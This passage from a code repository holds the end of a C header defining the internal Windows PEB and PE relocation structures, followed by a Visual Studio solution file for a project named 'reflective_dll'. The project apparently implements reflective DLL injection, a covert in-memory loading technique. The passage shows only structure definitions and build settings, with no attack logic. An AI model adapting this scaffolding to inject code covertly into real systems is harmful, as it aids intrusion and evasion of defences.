LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 
148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | /* One entry of a PE base-relocation block: a 12-bit offset within the block's page plus a 4-bit relocation type, matching the .reloc section layout. */ 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | 
-------------------------------------------------------------------------------- /Service_Reflective_dll/rdi.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30503.244 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM 19 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM 20 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 21 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM 26 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 27 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 28 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 29 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | 
GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {D658A35B-5F5E-4201-B1C2-902B8DC53354} 36 | EndGlobalSection 37 | EndGlobal 38 | --------------------------------------------------------------------------------